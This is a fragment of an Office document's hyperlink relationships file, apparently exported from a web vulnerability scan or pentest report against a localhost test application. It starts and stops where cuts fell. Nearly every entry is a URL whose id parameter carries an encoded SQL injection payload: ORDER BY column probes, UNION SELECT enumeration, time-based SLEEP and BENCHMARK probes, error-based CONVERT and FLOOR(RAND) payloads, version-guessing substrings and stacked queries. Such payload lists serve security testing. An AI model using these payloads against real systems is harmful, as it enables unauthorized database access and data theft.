Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2025--%20" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%20" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=';SELECT%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201%23" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(5650=5650)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0--" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%20" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4%23" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205%23%20" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6%23" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=x" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))%23" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3--%20" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205--%20" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2016%23%20" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,2,1))='y'" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId41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--%20" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%20" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y--%20" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208%20" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2016--%20" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%23%20" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%20" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3'%22%23" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--%20" TargetMode="External"/><Relationship Id="rId46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" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3%23" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027--%20" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%20" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3';SELECT%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%23" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%25'%20AND%208310=8310%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%20(SELECT%204523%20FROM(SELECT%20COUNT(*),CONCAT(0x716a7a6a71,(SELECT%20(ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%207%23%20" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%23" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20('1427=1427" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=x%23" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8%23" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--%20" TargetMode="External"/><Relationship Id="rId40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--%20" TargetMode="External"/><Relationship Id="rId44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%23" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%207--%20" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%23" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5--%20" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2018%23%20" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%20" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5%23" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL--%20" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='M'" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--%20" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2018--%20" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%23%20" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%20" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16%23" TargetMode="External"/><Relationship Id="rId42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--%20" TargetMode="External"/><Relationship Id="rId46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" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20(1427=1427" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5%23" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),3" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX'" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029--%20" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 